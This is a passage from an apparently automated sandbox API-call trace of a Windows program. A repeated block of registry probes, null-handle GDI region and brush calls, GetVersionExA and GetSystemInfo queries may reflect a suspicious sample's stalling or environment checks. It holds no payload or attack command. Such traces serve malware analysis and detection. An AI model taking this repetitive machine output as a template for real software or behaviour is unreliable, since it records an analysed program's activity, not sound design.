ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.465] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x880401d9 [0089.465] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x860401dc [0089.465] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045627 [0089.465] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045628 [0089.465] CombineRgn (hrgnDst=0x1045627, hrgnSrc1=0x880401d9, hrgnSrc2=0x860401dc, iMode=1) returned 1 [0089.465] CombineRgn (hrgnDst=0x1045628, hrgnSrc1=0x880401d9, hrgnSrc2=0x860401dc, iMode=4) returned 2 [0089.465] CreateSolidBrush (color=0xff) returned 0x2105626 [0089.465] CreateSolidBrush (color=0xff0000) returned 0x1105629 [0089.465] DeleteObject (ho=0x1105629) returned 1 [0089.465] DeleteObject (ho=0x860401dc) returned 1 [0089.465] DeleteObject (ho=0x880401d9) returned 1 [0089.465] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.465] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.465] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.465] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.465] BeginPath (hdc=0x0) returned 0 [0089.465] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.465] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.465] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.466] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.466] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.466] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x870401dc [0089.466] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x890401d9 [0089.466] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104562a [0089.466] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104562b [0089.466] CombineRgn (hrgnDst=0x104562a, hrgnSrc1=0x870401dc, hrgnSrc2=0x890401d9, iMode=1) returned 1 [0089.466] CombineRgn (hrgnDst=0x104562b, hrgnSrc1=0x870401dc, hrgnSrc2=0x890401d9, iMode=4) returned 2 [0089.466] CreateSolidBrush (color=0xff) returned 0x2105629 [0089.466] CreateSolidBrush (color=0xff0000) returned 0x110562c [0089.466] DeleteObject (ho=0x110562c) returned 1 [0089.466] DeleteObject (ho=0x890401d9) returned 1 [0089.466] DeleteObject (ho=0x870401dc) returned 1 [0089.466] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.466] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.466] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.466] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.466] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.466] BeginPath (hdc=0x0) returned 0 [0089.466] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.466] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.466] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.466] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.466] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.466] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.466] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.466] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.466] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8a0401d9 [0089.466] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x880401dc [0089.466] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104562d [0089.466] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104562e [0089.466] CombineRgn (hrgnDst=0x104562d, hrgnSrc1=0x8a0401d9, hrgnSrc2=0x880401dc, iMode=1) returned 1 [0089.467] CombineRgn (hrgnDst=0x104562e, hrgnSrc1=0x8a0401d9, hrgnSrc2=0x880401dc, iMode=4) returned 2 [0089.467] CreateSolidBrush (color=0xff) returned 0x210562c [0089.467] CreateSolidBrush (color=0xff0000) returned 0x110562f [0089.467] DeleteObject (ho=0x110562f) returned 1 [0089.467] DeleteObject (ho=0x880401dc) returned 1 [0089.467] DeleteObject (ho=0x8a0401d9) returned 1 [0089.467] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.467] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.467] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.467] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.467] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.467] BeginPath (hdc=0x0) returned 0 [0089.467] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.467] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.467] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.467] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.467] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.467] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.467] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.467] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x890401dc [0089.467] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8b0401d9 [0089.467] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045630 [0089.467] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045631 [0089.467] CombineRgn (hrgnDst=0x1045630, hrgnSrc1=0x890401dc, hrgnSrc2=0x8b0401d9, iMode=1) returned 1 [0089.467] CombineRgn (hrgnDst=0x1045631, hrgnSrc1=0x890401dc, hrgnSrc2=0x8b0401d9, iMode=4) returned 2 [0089.467] CreateSolidBrush (color=0xff) returned 0x210562f [0089.467] CreateSolidBrush (color=0xff0000) returned 0x1105632 [0089.467] DeleteObject (ho=0x1105632) returned 1 [0089.467] DeleteObject (ho=0x8b0401d9) returned 1 [0089.467] DeleteObject (ho=0x890401dc) returned 1 [0089.467] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.467] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.467] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.467] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.467] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.467] BeginPath (hdc=0x0) returned 0 [0089.468] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.468] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.468] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.468] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.468] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.468] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8c0401d9 [0089.468] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8a0401dc [0089.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045633 [0089.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045634 [0089.468] CombineRgn (hrgnDst=0x1045633, hrgnSrc1=0x8c0401d9, hrgnSrc2=0x8a0401dc, iMode=1) returned 1 [0089.468] CombineRgn (hrgnDst=0x1045634, hrgnSrc1=0x8c0401d9, hrgnSrc2=0x8a0401dc, iMode=4) returned 2 [0089.468] CreateSolidBrush (color=0xff) returned 0x2105632 [0089.468] CreateSolidBrush (color=0xff0000) returned 0x1105635 [0089.468] DeleteObject (ho=0x1105635) returned 1 [0089.468] DeleteObject (ho=0x8a0401dc) returned 1 [0089.468] DeleteObject (ho=0x8c0401d9) returned 1 [0089.468] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.468] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.468] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.468] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.468] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.468] BeginPath (hdc=0x0) returned 0 [0089.468] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.468] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.468] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.468] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.468] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.469] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8b0401dc [0089.469] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8d0401d9 [0089.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045636 [0089.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045637 [0089.469] CombineRgn (hrgnDst=0x1045636, hrgnSrc1=0x8b0401dc, hrgnSrc2=0x8d0401d9, iMode=1) returned 1 [0089.469] CombineRgn (hrgnDst=0x1045637, hrgnSrc1=0x8b0401dc, hrgnSrc2=0x8d0401d9, iMode=4) returned 2 [0089.469] CreateSolidBrush (color=0xff) returned 0x2105635 [0089.469] CreateSolidBrush (color=0xff0000) returned 0x1105638 [0089.469] DeleteObject (ho=0x1105638) returned 1 [0089.469] DeleteObject (ho=0x8d0401d9) returned 1 [0089.469] DeleteObject (ho=0x8b0401dc) returned 1 [0089.469] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.469] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.469] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.469] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.469] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.469] BeginPath (hdc=0x0) returned 0 [0089.469] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.469] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.469] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.469] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.469] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.469] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.469] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.469] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.469] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8e0401d9 [0089.469] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8c0401dc [0089.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045639 [0089.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104563a [0089.469] CombineRgn (hrgnDst=0x1045639, hrgnSrc1=0x8e0401d9, hrgnSrc2=0x8c0401dc, iMode=1) returned 1 [0089.470] CombineRgn (hrgnDst=0x104563a, hrgnSrc1=0x8e0401d9, hrgnSrc2=0x8c0401dc, iMode=4) returned 2 [0089.470] CreateSolidBrush (color=0xff) returned 0x2105638 [0089.470] CreateSolidBrush (color=0xff0000) returned 0x110563b [0089.470] DeleteObject (ho=0x110563b) returned 1 [0089.470] DeleteObject (ho=0x8c0401dc) returned 1 [0089.470] DeleteObject (ho=0x8e0401d9) returned 1 [0089.470] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.470] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.470] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.470] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.470] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.470] BeginPath (hdc=0x0) returned 0 [0089.470] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.470] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.470] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.470] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.470] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.470] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.470] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.470] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8d0401dc [0089.470] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8f0401d9 [0089.470] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104563c [0089.470] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104563d [0089.470] CombineRgn (hrgnDst=0x104563c, hrgnSrc1=0x8d0401dc, hrgnSrc2=0x8f0401d9, iMode=1) returned 1 [0089.470] CombineRgn (hrgnDst=0x104563d, hrgnSrc1=0x8d0401dc, hrgnSrc2=0x8f0401d9, iMode=4) returned 2 [0089.470] CreateSolidBrush (color=0xff) returned 0x210563b [0089.470] CreateSolidBrush (color=0xff0000) returned 0x110563e [0089.470] DeleteObject (ho=0x110563e) returned 1 [0089.470] DeleteObject (ho=0x8f0401d9) returned 1 [0089.470] DeleteObject (ho=0x8d0401dc) returned 1 [0089.471] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.471] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.471] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.471] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.471] BeginPath (hdc=0x0) returned 0 [0089.471] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.471] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.471] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.471] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.471] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x900401d9 [0089.471] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8e0401dc [0089.471] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104563f [0089.471] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045640 [0089.471] CombineRgn (hrgnDst=0x104563f, hrgnSrc1=0x900401d9, hrgnSrc2=0x8e0401dc, iMode=1) returned 1 [0089.471] CombineRgn (hrgnDst=0x1045640, hrgnSrc1=0x900401d9, hrgnSrc2=0x8e0401dc, iMode=4) returned 2 [0089.471] CreateSolidBrush (color=0xff) returned 0x210563e [0089.471] CreateSolidBrush (color=0xff0000) returned 0x1105641 [0089.471] DeleteObject (ho=0x1105641) returned 1 [0089.471] DeleteObject (ho=0x8e0401dc) returned 1 [0089.471] DeleteObject (ho=0x900401d9) returned 1 [0089.471] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.471] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.472] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.472] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.472] BeginPath (hdc=0x0) returned 0 [0089.472] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.472] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.472] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.472] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.472] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8f0401dc [0089.472] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x910401d9 [0089.472] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045642 [0089.472] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045643 [0089.472] CombineRgn (hrgnDst=0x1045642, hrgnSrc1=0x8f0401dc, hrgnSrc2=0x910401d9, iMode=1) returned 1 [0089.472] CombineRgn (hrgnDst=0x1045643, hrgnSrc1=0x8f0401dc, hrgnSrc2=0x910401d9, iMode=4) returned 2 [0089.472] CreateSolidBrush (color=0xff) returned 0x2105641 [0089.472] CreateSolidBrush (color=0xff0000) returned 0x1105644 [0089.472] DeleteObject (ho=0x1105644) returned 1 [0089.472] DeleteObject (ho=0x910401d9) returned 1 [0089.472] DeleteObject (ho=0x8f0401dc) returned 1 [0089.472] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, 